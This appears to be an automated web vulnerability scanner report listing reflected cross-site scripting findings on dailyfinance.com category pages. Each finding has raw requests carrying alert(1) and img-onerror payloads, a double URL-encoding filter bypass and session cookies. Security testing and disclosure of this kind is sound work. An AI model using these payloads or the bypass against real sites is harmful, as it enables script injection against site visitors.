The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe2a1%2522%253bead921a9154 was submitted in the REST URL parameter 2. This input was echoed as fe2a1";ead921a9154 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/careersfe2a1%2522%253bead921a9154/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.306. http://www.dailyfinance.com/category/careers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/category/careers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18edc"-alert(1)-"0161a350c66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/careers/?18edc"-alert(1)-"0161a350c66=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2fd0"><img%20src%3da%20onerror%3dalert(1)>81965e4e939 was submitted in the REST URL parameter 2. This input was echoed as a2fd0"><img src=a onerror=alert(1)>81965e4e939 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/college-financea2fd0"><img%20src%3da%20onerror%3dalert(1)>81965e4e939/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d87a8%2522%253bef859e81cd9 was submitted in the REST URL parameter 2. This input was echoed as d87a8";ef859e81cd9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/college-financed87a8%2522%253bef859e81cd9/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.309. http://www.dailyfinance.com/category/college-finance/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/category/college-finance/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37db9"-alert(1)-"9321b376c63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/college-finance/?37db9"-alert(1)-"9321b376c63=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36f14"><img%20src%3da%20onerror%3dalert(1)>841c29b1427 was submitted in the REST URL parameter 2. This input was echoed as 36f14"><img src=a onerror=alert(1)>841c29b1427 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/columns36f14"><img%20src%3da%20onerror%3dalert(1)>841c29b1427/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9dc7%2522%253b8695b09c20c was submitted in the REST URL parameter 2. This input was echoed as b9dc7";8695b09c20c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/columnsb9dc7%2522%253b8695b09c20c/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.312. http://www.dailyfinance.com/category/columns/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/category/columns/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f04e"-alert(1)-"1cd293d1ad6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/columns/?6f04e"-alert(1)-"1cd293d1ad6=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f21b7%2522%253be170da68d1 was submitted in the REST URL parameter 2. This input was echoed as f21b7";e170da68d1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/earningsf21b7%2522%253be170da68d1/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b93db"><img%20src%3da%20onerror%3dalert(1)>ba3fb660ed3 was submitted in the REST URL parameter 2. This input was echoed as b93db"><img src=a onerror=alert(1)>ba3fb660ed3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/earningsb93db"><img%20src%3da%20onerror%3dalert(1)>ba3fb660ed3/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Earningsb93db"><img Src=a Onerror=alert(1)>ba3fb660ed3" /> ...[SNIP]...
1.315. http://www.dailyfinance.com/category/earnings/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/category/earnings/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 797d0"-alert(1)-"4f96538448b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/earnings/?797d0"-alert(1)-"4f96538448b=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d081b"><img%20src%3da%20onerror%3dalert(1)>58565499139 was submitted in the REST URL parameter 2. This input was echoed as d081b"><img src=a onerror=alert(1)>58565499139 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/economyd081b"><img%20src%3da%20onerror%3dalert(1)>58565499139/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c219%2522%253b291f3c0cc74 was submitted in the REST URL parameter 2. This input was echoed as 4c219";291f3c0cc74 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/economy4c219%2522%253b291f3c0cc74/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.318. http://www.dailyfinance.com/category/economy/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/category/economy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6005"-alert(1)-"585ac83aa79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/economy/?e6005"-alert(1)-"585ac83aa79=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cd17%2522%253be5f63dbf4f4 was submitted in the REST URL parameter 2. This input was echoed as 1cd17";e5f63dbf4f4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/healthcare1cd17%2522%253be5f63dbf4f4/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86aea"><img%20src%3da%20onerror%3dalert(1)>bffd5453cff was submitted in the REST URL parameter 2. This input was echoed as 86aea"><img src=a onerror=alert(1)>bffd5453cff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/healthcare86aea"><img%20src%3da%20onerror%3dalert(1)>bffd5453cff/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Healthcare86aea"><img Src=a Onerror=alert(1)>bffd5453cff" /> ...[SNIP]...
1.321. http://www.dailyfinance.com/category/healthcare/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/category/healthcare/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f80ed"-alert(1)-"4f4e0ec7734 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/healthcare/?f80ed"-alert(1)-"4f4e0ec7734=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1daba%2522%253b192accb8528 was submitted in the REST URL parameter 2. This input was echoed as 1daba";192accb8528 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/investing1daba%2522%253b192accb8528/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8713e"><img%20src%3da%20onerror%3dalert(1)>61116ef77a1 was submitted in the REST URL parameter 2. This input was echoed as 8713e"><img src=a onerror=alert(1)>61116ef77a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/investing8713e"><img%20src%3da%20onerror%3dalert(1)>61116ef77a1/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Investing8713e"><img Src=a Onerror=alert(1)>61116ef77a1" /> ...[SNIP]...
1.324. http://www.dailyfinance.com/category/investing/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/category/investing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8e0d"-alert(1)-"a4fa3044bd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/investing/?c8e0d"-alert(1)-"a4fa3044bd6=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6891"><img%20src%3da%20onerror%3dalert(1)>e949d548e87 was submitted in the REST URL parameter 2. This input was echoed as a6891"><img src=a onerror=alert(1)>e949d548e87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/mediaa6891"><img%20src%3da%20onerror%3dalert(1)>e949d548e87/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
